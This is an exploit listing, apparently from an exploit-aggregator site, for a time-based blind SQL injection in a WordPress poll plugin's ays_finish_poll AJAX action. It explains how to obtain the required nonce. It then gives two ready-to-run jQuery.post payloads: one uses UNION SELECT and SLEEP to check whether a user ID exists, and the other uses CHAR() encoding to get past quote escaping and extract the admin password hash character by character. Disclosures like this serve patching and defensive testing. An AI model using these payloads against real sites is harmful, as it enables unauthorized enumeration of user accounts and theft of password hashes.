Share
## https://sploitus.com/exploit?id=WPEX-ID:24F933B0-AD57-4ED3-817D-D637256E2FB1
This requires a valid nonce, which can be obtained by going to a page with a published poll and checking the value of ays_finish_poll hidden input.

PoC 1: If the user 1234 exists, this query takes around 10 seconds; if not, the query should be quick.

jQuery.post(poll_maker_ajax_public.ajax_url,{answer:["12345) UNION SELECT 1,1,1,0,1,NULL,0,1,1 FROM wp_users WHERE ID=1234 AND SLEEP(10) AND user_status IN (0"],ays_finish_poll:"NONCE",action:"ays_finish_poll",poll_id:"3",end_date:"2021-08-18+22:11:27"})

PoC 2: This uses builtin MariaDB functions to bypass magic quote. CHAR(36,80,36,66,37 USING utf8) is "$P$B%" (in a LIKE statement). If this query takes more than 10 seconds to execute, there's probably a user with ID 1 and password hash starting with "$P$B".

jQuery.post(poll_maker_ajax_public.ajax_url,{answer:["12345) UNION SELECT 1,1,1,0,1,NULL,0,1,1 FROM wp_users WHERE ID=1 AND user_pass LIKE CHAR(36,80,36,66,37 USING utf8) AND SLEEP(10) AND user_status IN (0"],ays_finish_poll:"NONCE",action:"ays_finish_poll",poll_id:"3",end_date:"2021-08-18+22:11:27"})